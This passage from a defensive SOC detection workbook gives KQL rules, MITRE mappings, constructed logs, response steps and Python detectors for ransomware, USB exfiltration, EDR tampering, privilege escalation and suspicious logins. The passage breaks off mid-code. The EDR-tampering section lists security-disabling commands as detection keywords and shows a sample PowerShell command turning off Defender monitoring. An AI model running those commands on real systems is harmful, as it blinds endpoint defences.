| extend Alert = "High-volume file modifications indicative of ransomware"
Alternative Indicators:
• Spike in file I/O and CPU from single process (example, cmd.exe, unknown .exe)
• Files with unusual extensions (example, .encrypted, .locked, .r5a, .QeS)
• Detected rename + modify patterns in rapid succession
MITRE ATT&CK Mapping
Tactic: Impact
Technique: T1486 – Data Encrypted for Impact
Explanation:
This behaviour represents a ransomware attack in progress, aiming to encrypt user data
and possibly exfiltrate it before demanding ransom.
Log Sample (EDR File Event)
{
"TimeGenerated": "2025-04-23T14:45:08Z",
"DeviceName": "ACCT-PC19",
"InitiatingProcessAccountName": "nurshahira.zainal",
"InitiatingProcessFileName": "HRbackup_agent.exe",
"ActionType": "FileModified",
"FolderPath": "C:\\Users\\nurshahira\\Documents\\",
"FileName": "salary_details_2023.pdf.encrypted",
"FileHash": "d4d80c1ff2f6ae3ad4f91b52..."
}
(Repeat across hundreds of files within minutes)
Threat Behavior Indicators
• Mass file modifications by unknown or unsigned process
• Creation of ransom note files (example, README.txt, DECRYPT_FILES.html)
• High disk I/O usage isolated to one user/process
• File extension changes across multiple types
Response Actions
1. Immediately isolate the infected endpoint from network
2. Terminate the malicious process using EDR kill action
3. Check for lateral movement (example, shared drives, mapped folders)
4. Search for ransom notes and dropper files
5. Begin recovery using backups (offline & integrity verified)
6. Notify legal and compliance teams (especially for exfiltrated data)
17. Alert Name: Endpoint DLP Alert on Sensitive File Movement to USB Device
Alert Logic
Objective: Detect potential data exfiltration by flagging attempts to copy sensitive or
classified files to external USB storage devices.
Data Sources:
• Endpoint DLP solutions (Microsoft Purview, Symantec DLP, Forcepoint DLP)
• EDR with USB activity monitoring
• Windows Event Logs (Event ID 4663 – object access, with auditing enabled)
Detection Logic (KQL – Microsoft Defender for Endpoint + DLP Integration):
DeviceEvents
| where ActionType == "FileCopyToRemovableMedia"
| where FileName matches regex @"(?i)\.(docx|xlsx|pdf|csv|zip)$"
| where FileSensitivityLabel in~ ("Confidential", "Restricted", "Sensitive")
| summarize FileCount = count(), UniqueFiles = dcount(FileName) by DeviceName, ReportedUser, RemovableMediaName, bin(Timestamp, 1h)
| where FileCount > 5
| extend Alert = "Sensitive files copied to USB device"
Alternative Indicators:
• USB drive mounted followed by rapid access to sensitive file types
• Absence of encryption or device control policies
• File copy operations shortly before employee resignation or suspicious behaviour
MITRE ATT&CK Mapping
Tactic: Exfiltration
Technique: T1052.001 – Exfiltration over Physical Medium: Removable Media
Explanation:
USB drives are frequently used by insiders or malware to steal data, bypassing network
controls entirely.
Log Entry (Microsoft Purview DLP Alert)
{
"TimeGenerated": "2025-04-23T15:10:00Z",
"ReportedUser": "hasif.azman@company.com",
"DeviceName": "HR-LAPTOP02",
"RemovableMediaName": "KINGSTON USB 3.0",
"ActionType": "FileCopyToRemovableMedia",
"FileName": "2024_salary_structure.xlsx",
"FileSensitivityLabel": "Confidential",
"FileSize": "834 KB"
}
Threat Behavior Indicators
• DLP alert involving multiple confidential files copied to a removable device
• USB activity from non-corporate branded devices (example, personal USBs)
• Event occurs outside business hours or from unmanaged endpoints
• File types linked to HR, finance, legal or intellectual property
Response Actions
1. Block the user’s access and eject USB immediately if real-time
2. Retrieve and analyse the copied files to assess sensitivity and impact
3. Interview the user and check employment status (resignation, internal issues)
4. Review full DLP policy coverage (should log, block or encrypt when USB used)
5. Correlate with previous access logs or DLP alerts to see if it’s part of a pattern
6. Implement stricter USB controls (example, allow list, encryption enforcement,
monitoring)
18. Alert Name: VPN Login from Blacklisted IP Addresses
Alert Logic
Objective: Detect when a user successfully authenticates to the corporate VPN from an IP
address known to be malicious, part of anonymisation services (example, Tor, proxy/VPN
providers) or listed on threat intelligence feeds.
Data Sources:
• VPN logs (example, Cisco ASA, Fortinet, Palo Alto GlobalProtect, OpenVPN)
• Identity provider logs (Azure AD, Okta, etc.)
• Threat Intelligence feeds (example, AlienVault OTX, AbuseIPDB, BrightCloud)
Detection Logic (KQL – VPN Logs + TI Enrichment):
VPNAuthenticationLogs
| where EventResult == "Success"
| join kind=inner (
    ThreatIntelIP
    | project TI_IP = IpAddress
) on $left.SourceIP == $right.TI_IP
| summarize LoginsFromTI = count() by User, SourceIP, Country, ASN, TimeGenerated
| extend Alert = "Successful VPN login from blacklisted IP"
Logic Summary:
• Filters successful logins
• Cross-references login source IP against threat intelligence feeds
• Can be enhanced with country-based geofencing or ASN categorisation
MITRE ATT&CK Mapping
Tactic: Initial Access
Techniques: T1078 – Valid Accounts; T1566 – Phishing (initial credential theft leading to VPN abuse)
Explanation:
Attackers frequently exploit stolen credentials via VPN access, especially when no geo-blocking or MFA enforcement is in place. Logins from known bad IPs can indicate botnet usage, compromised proxy servers or obfuscation.
VPN Log Entry
{
"TimeGenerated": "2025-04-23T15:28:17Z",
"User": "zahir.abidin@company.com",
"SourceIP": "185.220.101.44",
"VPNGateway": "vpn.corp.company.com",
"Location": "Netherlands",
"Provider": "Tor Exit Node",
"Result": "Success"
}
Threat Intelligence Match
{
"TI_IP": "185.220.101.44",
"Reputation": "Tor Exit Node, Proxy Service",
"ConfidenceScore": 90,
"Category": "Anonymiser, Suspicious Access Point",
"LastSeen": "2025-04-22T22:01:00Z"
}
Threat Behavior Indicators
• Login from anonymised services (example, Tor, NordVPN, ExpressVPN)
• No prior login history from that IP or region
• IP is part of a known threat actor infrastructure
• Login followed by unusual actions (example, mass downloads, privilege escalation)
Response Actions
1. Revoke VPN session/token immediately
2. Force password reset for the affected user
3. Correlate login with user behaviour before and after VPN access
4. Add the blacklisted IP to a denylist at VPN/firewall
5. Enforce IP allowlist and geo-fencing for VPN access
6. Ensure MFA is enforced on all VPN connections
19. Alert Name: Disabled Antivirus or EDR Agent Service on Endpoint
Alert Logic
Objective: Detect when security-critical services like antivirus, EDR or XDR agents are
disabled, either manually or by malware, which is a common precursor to further
exploitation or evasion.
Data Sources:
• Windows Event Logs (Event ID 7036 – Service state change)
• Sysmon (Event ID 6 – Driver loaded, Event ID 1 – Process creation)
• EDR/XDR alerts (example, Defender for Endpoint, CrowdStrike, SentinelOne)
Detection Logic (KQL – Event Logs + Process Correlation):
Event
| where EventID == 7036 and EventData contains "stopped"
| where ServiceName has_any ("WinDefend", "Sense", "CrowdStrike", "SentinelAgent", "CarbonBlack")
| extend Alert = "Security service disabled on endpoint"
Alternate (EDR Detection for Service Tampering):
DeviceProcessEvents
| where FileName == "sc.exe" or FileName == "powershell.exe"
| where ProcessCommandLine has_any ("stop-service", "sc stop", "Set-MpPreference", "DisableRealtimeMonitoring")
MITRE ATT&CK Mapping
Tactic: Defense Evasion
Techniques: T1562.001 – Disable or Modify Tools: Security Software; T1059.001 – PowerShell abuse for tampering
Explanation:
Disabling security tools is a common step in many malware chains to avoid detection
before executing payloads or moving laterally.
Log (Windows System Event – 7036)
{
"EventID": 7036,
"TimeGenerated": "2025-04-23T15:42:29Z",
"ComputerName": "ENG-LAPTOP09",
"ServiceName": "WinDefend",
"ServiceStatus": "stopped",
"TriggeredBy": "user32.dll via powershell.exe"
}
EDR Log (Process Tampering)
{
"TimeGenerated": "2025-04-23T15:42:35Z",
"DeviceName": "ENG-LAPTOP09",
"InitiatingProcessAccountName": "hamzah.yusri@company.com",
"FileName": "powershell.exe",
"ProcessCommandLine": "powershell -Command \"Set-MpPreference -DisableRealtimeMonitoring $true\"",
"ParentProcess": "cmd.exe"
}
Threat Behavior Indicators
• Service stop events targeting Defender, CrowdStrike, SentinelOne, etc.
• Admin utilities (example, sc.exe, PowerShell) used to alter protection states
• Tampering observed outside of scheduled patching or IT change window
• EDR agent uninstall or sensor heartbeat lost
Response Actions
1. Immediately re-enable the security service or reinstall the EDR agent
2. Investigate the parent process responsible for service shutdown
3. Isolate the endpoint if compromise is confirmed
4. Correlate with process execution history and check for follow-up activity
5. Deploy prevention rules to block tampering commands
6. Ensure tamper protection is enabled across all agents
20. Alert Name: Mass File Deletion Detected on Shared Folder
Alert Logic
Objective: Detect mass deletion of files in a network share or shared directory, a behaviour
commonly linked to ransomware, sabotage or rogue insiders.
Data Sources:
• File system auditing (Windows Event ID 4660 – Object Deleted)
• File Integrity Monitoring (FIM)
• EDR (with file operation telemetry)
• NAS/SAN appliance logs (example, NetApp, QNAP, Synology)
Detection Logic (KQL – File Delete Volume Monitoring):
DeviceFileEvents
| where ActionType == "FileDeleted"
| where FolderPath has "\\NetworkShare\\" or FolderPath startswith "\\\\"
| summarize DeleteCount = count(), UniqueFiles = dcount(FileName) by DeviceName, InitiatingProcessAccountName, bin(Timestamp, 5m)
| where DeleteCount > 100 and UniqueFiles > 80
| extend Alert = "Mass file deletion detected on shared folder"
Alternative Logic (Windows Event ID 4660 + Share Location Filtering):
SecurityEvent
| where EventID == 4660
| where ObjectName contains "\\Shared\\"
| summarize DeletedFiles = count() by AccountName, Computer, bin(TimeGenerated, 5m)
| where DeletedFiles > 100
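Alerts 16 (ransomware file modification) and 20 (mass deletion on shares) share the same shape: count events per device, account and 5-minute bucket, then threshold on both total events and distinct files. The Python below, an added example rather than the workbook's own logic, implements that once and runs it for both, with the UNC-path filter for deletions and a count of ransomware-style extensions for modifications. The hosts, accounts, file names and timings are constructed so each burst lands inside a single 5-minute bucket.

```python
"""Added example: 5-minute bucketed burst detection for file modification
(ransomware, alert 16) and file deletion on shares (alert 20).

Not part of the workbook; the events, hosts and accounts are constructed.
"""
import os
from collections import defaultdict
from datetime import datetime, timedelta

# Extensions the workbook lists as typical ransomware renames (lower-cased).
RANSOM_EXTENSIONS = {".encrypted", ".locked", ".r5a", ".qes"}


def parse_ts(value):
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def bucket_start(value, minutes=5):
    """Floor a timestamp to the start of its fixed-width bucket (like KQL bin())."""
    t = parse_ts(value)
    return t.replace(minute=(t.minute // minutes) * minutes, second=0, microsecond=0)


def is_share_path(folder):
    """UNC paths (\\\\server\\share\\...) identify network-share activity."""
    return folder.startswith("\\\\")


def _file_event(when, device, account, action, folder, name):
    return {"TimeGenerated": when.isoformat() + "Z", "DeviceName": device,
            "InitiatingProcessAccountName": account, "ActionType": action,
            "FolderPath": folder, "FileName": name}


def build_sample_events():
    events = []
    # Ransomware-like: 120 modifications, every file renamed to .encrypted, in ~3 minutes.
    start = datetime(2025, 4, 23, 14, 45, 8)
    for i in range(120):
        events.append(_file_event(start + timedelta(seconds=1.5 * i), "ACCT-PC19",
                                  "nurshahira.zainal", "FileModified",
                                  "C:\\Users\\nurshahira\\Documents\\", f"doc_{i:03d}.pdf.encrypted"))
    # Mass deletion on a share: 120 files in two minutes.
    start = datetime(2025, 4, 23, 15, 55, 12)
    for i in range(120):
        events.append(_file_event(start + timedelta(seconds=i), "SALES-LAPTOP18",
                                  "syed.hafiz", "FileDeleted",
                                  "\\\\fileserver01\\Shared\\2023Projects\\", f"contract_{i:03d}.pdf"))
    # Benign: a user clearing 20 files from a local temp folder.
    start = datetime(2025, 4, 23, 16, 2, 0)
    for i in range(20):
        events.append(_file_event(start + timedelta(seconds=i), "ENG-LAPTOP03",
                                  "lee.wen", "FileDeleted", "C:\\Temp\\", f"build_{i}.log"))
    return events


def detect_bulk_file_activity(events, action, count_threshold=100, distinct_threshold=80,
                              path_filter=None):
    """Group events by (device, account, 5-minute bucket) for one ActionType and return
    buckets whose event count and distinct-file count both exceed the thresholds.
    The count of ransomware-style extensions in the bucket is reported as well."""
    groups = defaultdict(list)
    for ev in events:
        if ev["ActionType"] != action:
            continue
        if path_filter is not None and not path_filter(ev["FolderPath"]):
            continue
        key = (ev["DeviceName"], ev["InitiatingProcessAccountName"], bucket_start(ev["TimeGenerated"]))
        groups[key].append(ev)

    findings = []
    for (device, account, start), evs in sorted(groups.items(), key=lambda kv: kv[0][2]):
        distinct = {e["FileName"] for e in evs}
        if len(evs) > count_threshold and len(distinct) > distinct_threshold:
            ransom_like = sum(1 for e in evs
                              if os.path.splitext(e["FileName"])[1].lower() in RANSOM_EXTENSIONS)
            findings.append({"DeviceName": device, "Account": account, "ActionType": action,
                             "WindowStart": start.isoformat(), "EventCount": len(evs),
                             "DistinctFiles": len(distinct), "RansomExtensionFiles": ransom_like})
    return findings


def run_both_detections(events):
    """Alert 16 and alert 20 rules as used by the sample run."""
    ransomware = detect_bulk_file_activity(events, "FileModified")
    mass_delete = detect_bulk_file_activity(events, "FileDeleted", path_filter=is_share_path)
    return ransomware, mass_delete


if __name__ == "__main__":
    for group in run_both_detections(build_sample_events()):
        for finding in group:
            print(finding)
```

One thing to watch with fixed buckets: a burst that straddles a bucket boundary splits into two halves that may each stay under the threshold. A sliding window, or overlapping buckets offset by half the width, closes that gap at the cost of some duplicate alerts.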
MITRE ATT&CK Mapping
Tactic: Impact
Technique: T1485 – Data Destruction
Explanation:
Threat actors and malicious insiders may delete business-critical files to disrupt
operations, destroy logs or as part of ransomware finalisation.
File Delete Log (EDR or FIM Style)
{
"TimeGenerated": "2025-04-23T15:55:12Z",
"DeviceName": "SALES-LAPTOP18",
"InitiatingProcessAccountName": "syed.hafiz@company.com",
"ActionType": "FileDeleted",
"FolderPath": "\\\\fileserver01\\Shared\\2023Projects\\",
"FileName": "contract_summary_q3.pdf",
"ProcessName": "cmd.exe"
}
(Occurs repeatedly with different filenames in short span)
Threat Behavior Indicators
• 100 files deleted within 5 minutes from shared drives
• Deletion initiated via cmd.exe, PowerShell or script-based processes
• User account not typically accessing the folder (privilege misuse or insider risk)
• Folders targeted contain sensitive business, legal or operational files
Response Actions
1. Immediately isolate the host and revoke user access
2. Initiate file recovery from latest backups or shadow copies
3. Investigate user intent (negligence, resignation, insider threat, malware)
4. Check for corresponding file modification/encryption before deletion
5. Deploy alerting for bulk deletes and FIM policy enforcement
6. Enable versioning or recycle bin features on network shares where possible
21. Alert Name: New Domain Admin Group Member Added
Alert Logic
Objective: Detect unauthorised privilege escalation through addition of a user to the highly
sensitive Domain Admins group, often signalling lateral movement or intent to maintain full
domain control.
Data Sources:
• Windows Security Logs (Event ID 4728 – User added to a global security-enabled
group)
• Azure AD logs (for hybrid/Cloud Identity environments)
• Active Directory change audit tools (example, ADAudit, Quest Change Auditor)
Detection Logic (KQL – Windows Security Event Example):
SecurityEvent
| where EventID == 4728
| where TargetUserName != "" and GroupName =~ "Domain Admins"
| where SubjectUserName !contains "admin" and SubjectUserName !startswith "svc"
| extend Alert = "User added to Domain Admin group"
Optional Enhancements:
• Filter based on time-of-day (example, after-hours activity)
• Cross-reference with expected change management activity
• Alert only if the actor is not part of IT operations
MITRE ATT&CK Mapping
Tactic: Privilege Escalation, Persistence
Techniques: T1098 – Account Manipulation; T1078.002 – Valid Accounts: Domain Accounts
Explanation:
Adversaries who gain a foothold in a domain will often attempt to escalate privileges by
modifying group memberships, especially targeting Domain Admins, Enterprise Admins or
custom high-privilege groups.
Log Entry (Windows Security Event – 4728)
{
"EventID": 4728,
"TimeGenerated": "2025-04-23T16:10:47Z",
"SubjectUserName": "nurhidayah.rahim",
"TargetUserName": "helpdesk_temp",
"GroupName": "Domain Admins",
"Domain": "CORP",
"Computer": "DC01.CORP.local"
}
Threat Behavior Indicators
• New user added to privileged group from a low-privilege account
• Change occurs during off-hours or with no associated ticket
• Rapid follow-up actions like login to DC, GPO modification or lateral movement
• New admin account appears in event logs or EDR tools with unexpected activity
Response Actions
1. Immediately remove the user from the Domain Admins group
2. Reset credentials for the user and review their recent activity
3. Check whether the change was initiated via PowerShell, net.exe or ADUC
4. Review DC logs and perform threat hunting across domain controllers
5. Implement Group Membership change alerting via SIEM and AD auditing
6. Restrict account modification rights using tiered admin model (Tier 0, 1, 2)
22. Alert Name: Login from Newly Registered Domain Email Address
Alert Logic
Objective: Detect login attempts, successful or failed, using email addresses from recently
registered domains, which are commonly used in phishing, BEC (Business Email
Compromise) and spoofing attacks.
Data Sources:
• Identity provider logs (Azure AD, Okta, Google Workspace)
• Email security platforms (Proofpoint, Mimecast, Microsoft Defender for Office 365)
• Domain WHOIS & threat intelligence feeds (example, DomainTools, RiskIQ,
VirusTotal)
Detection Logic (KQL – Identity + WHOIS TI):
SigninLogs
| extend Domain = tostring(split(UserPrincipalName, "@")[1])
| join kind=inner (
DomainReputationFeed
| where RegistrationAgeDays < 30
| project Domain
) on Domain
| extend Alert = "Login attempt from newly registered domain"
Logic Summary:
• Extracts domain from login email
• Compares against threat intel / WHOIS data showing domain registration within the
past 30 days
• Optional: filter only if login failed or if it's an external identity not whitelisted
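As an added example (not from the workbook), the Python below does the domain extraction and age lookup in code: it refangs the [.] notation used in the sample log, skips the corporate domain, ages every other domain against a constructed registration feed (a stand-in for a WHOIS or TI lookup), and reports separately the domains the feed cannot age. Feed entries, dates, UPNs and IPs are constructed.

```python
"""Added example: flag sign-ins whose e-mail domain was registered recently.

Not part of the workbook; the sign-ins, the WHOIS-style feed and the dates are
constructed. Defanged domains written with [.] are normalised before lookup.
"""
from datetime import date

# Constructed domain-registration feed (stand-in for a WHOIS / TI lookup).
DOMAIN_FEED = {
    "company.com": date(2004, 6, 1),
    "partner-example.test": date(2019, 3, 14),
    "corp-helpdesk-support.com": date(2025, 4, 18),
}
CORPORATE_DOMAINS = {"company.com"}

# Constructed sign-in records.
SAMPLE_SIGNINS = [
    {"TimeGenerated": "2025-04-23T16:25:30Z", "Result": "Failure", "IPAddress": "104.248.23.88",
     "UserPrincipalName": "muhammad.amin@corp-helpdesk-support[.]com"},
    {"TimeGenerated": "2025-04-23T16:26:02Z", "Result": "Success", "IPAddress": "10.20.0.12",
     "UserPrincipalName": "aina.yusof@company.com"},
    {"TimeGenerated": "2025-04-23T16:27:45Z", "Result": "Success", "IPAddress": "198.51.100.7",
     "UserPrincipalName": "vendor@partner-example.test"},
    {"TimeGenerated": "2025-04-23T16:28:10Z", "Result": "Failure", "IPAddress": "198.51.100.8",
     "UserPrincipalName": "guest@never-seen-before.test"},
]


def refang(domain):
    """Turn report-style defanging back into a resolvable name for lookups."""
    return domain.replace("[.]", ".").replace("(.)", ".")


def login_domain(upn):
    """Return the lower-cased, refanged domain part of a UPN, or None."""
    if "@" not in upn:
        return None
    return refang(upn.rsplit("@", 1)[1].strip().lower())


def registration_age_days(domain, feed, as_of):
    """Days since registration, or None when the feed has no record."""
    registered = feed.get(domain)
    return (as_of - registered).days if registered else None


def flag_new_domain_logins(signins, feed=DOMAIN_FEED, corporate=CORPORATE_DOMAINS,
                           max_age_days=30, as_of=date(2025, 4, 23)):
    """Return (alerts, unknown): alerts for external domains younger than max_age_days,
    unknown for domains the feed cannot age (worth a separate, lower-severity look)."""
    alerts, unknown = [], []
    for s in signins:
        domain = login_domain(s["UserPrincipalName"])
        if domain is None or domain in corporate:
            continue
        age = registration_age_days(domain, feed, as_of)
        if age is None:
            unknown.append({"UserPrincipalName": s["UserPrincipalName"], "Domain": domain})
        elif age < max_age_days:
            alerts.append({"UserPrincipalName": s["UserPrincipalName"], "Domain": domain,
                           "RegistrationAgeDays": age, "Result": s["Result"],
                           "IPAddress": s["IPAddress"],
                           "Alert": "Login attempt from newly registered domain"})
    return alerts, unknown


if __name__ == "__main__":
    flagged, unaged = flag_new_domain_logins(SAMPLE_SIGNINS)
    print("alerts:", flagged)
    print("no registration data:", unaged)
```

Keeping the "unknown" bucket separate matters in practice: a feed miss is not evidence the domain is old, and treating it as benign would let exactly the freshly registered domains this rule targets slip through when the feed lags.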
MITRE ATT&CK Mapping
Tactic: Initial Access
Techniques: T1566 – Phishing; T1585 – Establish Accounts (Spoofed External Identity)
Explanation:
Threat actors often register lookalike or fake domains (example, micros0ft-support.com) to
perform targeted attacks, especially against SSO portals, B2B platforms and federated
login flows.
Sign-in Log Entry
{
"TimeGenerated": "2025-04-23T16:25:30Z",
"UserPrincipalName": "muhammad.amin@corp-helpdesk-support[.]com",
"Result": "Failure",
"Location": "Singapore",
"ClientAppUsed": "Browser",
"IPAddress": "104.248.23.88",
"Device": "Unknown",
"DomainRegistrationDate": "2025-04-18",
"RegistrationAgeDays": 5
}
Threat Behavior Indicators
• Login attempts using suspicious domains not previously seen in your environment
• Domains registered in the last 7–30 days (freshly created)
• Account names that impersonate real vendors, employees or departments
• Repeated failed attempts from different IPs (spray-and-pray phishing)
Response Actions
1. Block the domain at identity provider, email gateway and firewall
2. Search all email logs for messages from or to the domain
3. Enable conditional access policies restricting unknown domains or guest users
4. Implement domain reputation checks in login and guest invitation flows
5. Educate users about lookalike domain spoofing and phishing indicators
23. Alert Name: Brute-force Attack Detected on Web-facing Application Login
Alert Logic
Objective: Detect repeated failed login attempts to publicly accessible applications
(example, webmail, VPN, CRM, portals), a common tactic used to gain unauthorised
access via credential stuffing or password guessing.
Data Sources:
• Web server logs (IIS, Apache, Nginx)
• WAF logs (example, Cloudflare, AWS WAF, Azure WAF)
• Identity Provider logs (example, Okta, Azure AD)
• SIEM log ingestion from login endpoints
Detection Logic (KQL – Web App Logs or WAF + Identity):
WebAppAuthLogs
| where Result == "Failed"
| summarize FailCount = count(), UniqueUsers = dcount(UserName) by SourceIP, bin(Timestamp, 5m)
| where FailCount > 30 or UniqueUsers > 10
| extend Alert = strcat("Possible brute-force or credential stuffing attack from ", SourceIP)
Alternate Detection (WAF):
WAFLogs
| where RuleMatched contains "Login Brute Force"
| summarize Attempts = count() by SourceIP, TargetURL, bin(TimeGenerated, 5m)
MITRE ATT&CK Mapping
Tactic: Credential Access
Techniques: T1110.003 – Brute Force: Credential Stuffing; T1190 – Exploit Public-Facing Application (if paired with known vuln scan)
Explanation:
Attackers often test credential reuse across multiple web apps using bots and leaked
usernames/emails from previous breaches.
Web Auth Log (JSON)
{
"TimeGenerated": "2025-04-23T16:40:01Z",
"Application": "Webmail Portal",
"SourceIP": "203.217.55.188",
"UserName": "zuraida.hassan@company.com",
"LoginResult": "Failed",
"UserAgent": "Mozilla/5.0 (Linux; Android 9)",
"TargetURL": "/login",
"FailCountFromIP": 52,
"LoginAttemptsWithin5min": 37
}
Threat Behavior Indicators
• 30 failed logins from the same IP within 5 minutes
• Multiple usernames targeted from the same IP (spray)
• Odd user-agents (example, bots, emulators, curl or python-requests)
• Source IP from anonymisation services or foreign geolocations
Response Actions
1. Temporarily block or rate-limit the source IP via WAF or firewall
2. Enable CAPTCHA or MFA enforcement on targeted login endpoints
3. Investigate whether any accounts were successfully accessed
4. Notify targeted users to reset passwords and review MFA configuration
5. Implement lockout policies or throttling on the authentication service
6. Enable anomaly-based login alerts in the IdP or SIEM
24. Alert Name: Unusual Login Time Detected Based on User Behaviour Baseline
Alert Logic
Objective: Detect login activity that deviates from a user’s normal login patterns, especially
during unusual hours (example, late night or weekends), which can indicate compromised
credentials or insider threat.
Data Sources:
• Identity provider logs (Azure AD, Okta, G Suite)
• SIEM UEBA modules (User and Entity Behaviour Analytics)
• VPN / SSO / authentication gateway logs
Detection Logic (KQL – SigninLogs + Behaviour Baseline):
let UserLoginHours = SigninLogs
| where ResultType == 0
| summarize TypicalHour = percentile(datetime_part("hour", TimeGenerated), 95) by UserPrincipalName;
SigninLogs
| where ResultType == 0
| extend LoginHour = datetime_part("hour", TimeGenerated)
| join kind=inner (UserLoginHours) on UserPrincipalName
| where abs(LoginHour - TypicalHour) > 5
| extend Alert = "Login time anomaly: outside typical working hours"
Alternate Approach (Static Time Range):
SigninLogs
| where ResultType == 0
| where datetime_part("hour", TimeGenerated) < 6 or datetime_part("hour", TimeGenerated) > 22
| extend Alert = "User login detected outside normal working hours"
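The baseline query above subtracts hours directly, which breaks at midnight: a night-shift operator whose typical hour is 23 and who logs in at 01 is two hours off, not twenty-two, and would be flagged every morning. The Python below is an added example, not the workbook's rule; it builds a per-user baseline as a circular mean of past login hours, measures deviation as the shortest distance on the 24-hour clock, and skips users with too little history to have a baseline. The login history and sign-ins are constructed.

```python
"""Added example: per-user login-hour baseline with circular hour arithmetic.

Not part of the workbook; the history and sign-ins are constructed.
"""
import math
from collections import defaultdict

HOURS = 24


def circular_mean_hour(hours):
    """Mean of hour-of-day values treated as angles on a 24-hour clock."""
    s = sum(math.sin(2 * math.pi * h / HOURS) for h in hours)
    c = sum(math.cos(2 * math.pi * h / HOURS) for h in hours)
    return (math.atan2(s, c) * HOURS / (2 * math.pi)) % HOURS


def hour_distance(a, b):
    """Shortest distance between two hours on the clock face (0..12)."""
    d = abs(a - b) % HOURS
    return min(d, HOURS - d)


def build_baselines(history, min_logins=5):
    """history: list of (user, hour) from past successful sign-ins.
    Users with too little history get no baseline and are skipped by the detector."""
    per_user = defaultdict(list)
    for user, hour in history:
        per_user[user].append(hour)
    return {u: circular_mean_hour(h) for u, h in per_user.items() if len(h) >= min_logins}


def detect_off_hours_logins(signins, baselines, max_deviation=5):
    """signins: list of dicts with UserPrincipalName and LoginHour (successful only)."""
    alerts = []
    for s in signins:
        typical = baselines.get(s["UserPrincipalName"])
        if typical is None:
            continue                       # no baseline yet: nothing to deviate from
        deviation = hour_distance(s["LoginHour"], typical)
        if deviation > max_deviation:
            alerts.append({**s, "TypicalLoginHour": round(typical, 1),
                           "DeviationHours": round(deviation, 1),
                           "Alert": "Login time anomaly: outside typical working hours"})
    return alerts


# Constructed history (user, hour): a day-shift analyst, a night-shift operator, a new joiner.
SAMPLE_HISTORY = (
    [("farid.azwan@company.com", h) for h in (8, 9, 9, 10, 9, 8, 10)]
    + [("ops.night@company.com", h) for h in (22, 23, 0, 1, 23)]
    + [("new.joiner@company.com", 9)]
)
# Constructed sign-ins to score against those baselines.
SAMPLE_SIGNINS = [
    {"UserPrincipalName": "farid.azwan@company.com", "LoginHour": 3, "IPAddress": "41.67.128.93"},
    {"UserPrincipalName": "ops.night@company.com", "LoginHour": 1, "IPAddress": "10.20.0.40"},
    {"UserPrincipalName": "ops.night@company.com", "LoginHour": 14, "IPAddress": "10.20.0.40"},
    {"UserPrincipalName": "new.joiner@company.com", "LoginHour": 2, "IPAddress": "10.20.0.41"},
]


def run_sample():
    return detect_off_hours_logins(SAMPLE_SIGNINS, build_baselines(SAMPLE_HISTORY))


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

In the sample run the day-shift login at 03:00 and the night-shift login at 14:00 are flagged, the night-shift login at 01:00 is not, and the new joiner is skipped until enough history exists; a static 06:00 to 22:00 rule like the alternate query above would have fired on the night-shift user's normal 01:00 login.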
MITRE ATT&CK Mapping
Tactic: Defense Evasion
Techniques: T1078 – Valid Accounts; T1036 – Masquerading (via timing)
Explanation:
Attackers often conduct activities during low-monitoring hours to avoid detection.
Anomalous logins outside business hours can reveal compromised or misused
credentials.
Login Log Entry
{
"TimeGenerated": "2025-04-23T03:21:15Z",
"UserPrincipalName": "farid.azwan@company.com",
"ResultType": 0,
"IPAddress": "41.67.128.93",
"Location": "South Africa",
"ClientAppUsed": "Browser",
"LoginHour": 3,
"TypicalLoginHour": 9
}
Threat Behavior Indicators
• Login time deviates significantly from baseline (example, >5-hour difference)
• Occurs outside business hours or on weekends/holidays
• Unusual geolocation or IP associated with the login
• Followed by abnormal activity (example, mass file access, group membership
changes)
Response Actions
1. Validate with user whether they logged in intentionally
2. Check activity following login for indicators of malicious actions
3. Correlate with known IP, device and user risk scores
4. Force password reset and revalidate MFA for the account
5. Create behaviour baselines and automate anomaly detection in SIEM
6. Enable alerts for future logins during abnormal hours
25. Alert Name: Uncommon Protocol Usage Detected Over Standard Ports
Alert Logic
Objective: Detect when protocols or traffic types deviate from expected usage on well-known
ports, a tactic often used by attackers to bypass network security controls or hide
malicious traffic.
Data Sources:
• Network traffic logs (NetFlow, Zeek, Suricata, firewall logs)
• IDS/IPS alerts
• Deep packet inspection (DPI) sensors
Detection Logic (KQL – Zeek or NetFlow Style Analysis):
NetworkTraffic
| where DestinationPort == 80 or DestinationPort == 443
| where Protocol !in ("HTTP", "HTTPS")
| summarize SessionCount = count() by SourceIP, DestinationIP, DestinationPort, Protocol, bin(Timestamp, 5m)
| where SessionCount > 10
| extend Alert = "Unusual protocol detected on standard web port"
Examples of Abuse:
• SSH over port 443
• FTP or SMB tunneled over port 80
• Remote administration tools using disguised ports
• Custom malware C2 using HTTP ports for binary or encrypted data
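Whether SSH or SMB is riding on port 443 or 80 is decidable from the first bytes the client sends, which is what Zeek's protocol analysers and DPI sensors do before the Protocol field in the query above ever gets populated. The Python below is an added, simplified example, not part of the workbook or of any product: it classifies a flow's first bytes (SSH identification string, TLS record header, HTTP method, SMB header) and compares the result with the protocol expected on the destination port. The flows, addresses and the port policy table are constructed.

```python
"""Added example: classify the first client bytes of a flow and compare with the port.

Not part of the workbook; the flow samples and the port policy are constructed.
"""
import re

HTTP_METHOD = re.compile(rb"^(GET|POST|PUT|HEAD|DELETE|OPTIONS|PATCH|CONNECT|TRACE) ")

# Expected application protocol for well-known ports (constructed policy table).
EXPECTED_BY_PORT = {80: "HTTP", 443: "TLS", 22: "SSH", 445: "SMB"}


def classify_payload(data):
    """Return the protocol suggested by the first client bytes, or 'UNKNOWN'."""
    if data.startswith(b"SSH-"):
        return "SSH"                                   # SSH identification string
    if len(data) >= 3 and data[0] == 0x16 and data[1] == 0x03 and data[2] <= 0x04:
        return "TLS"                                   # TLS record: handshake type, version 3.x
    if HTTP_METHOD.match(data):
        return "HTTP"
    if b"\xffSMB" in data[:8] or b"\xfeSMB" in data[:8]:
        return "SMB"                                   # SMB1/SMB2 header after the NetBIOS header
    return "UNKNOWN"


def check_flow(flow):
    """flow: dict with SourceIP, DestinationIP, DestinationPort, FirstBytes.
    Returns a finding dict (with Verdict) for every flow so callers can filter."""
    expected = EXPECTED_BY_PORT.get(flow["DestinationPort"])
    observed = classify_payload(flow["FirstBytes"])
    if expected is None:
        verdict = "no-policy"
    elif observed == "UNKNOWN":
        verdict = "unclassified"     # encrypted or custom protocol on a web port: worth a look
    elif observed == expected:
        verdict = "ok"
    else:
        verdict = "mismatch"
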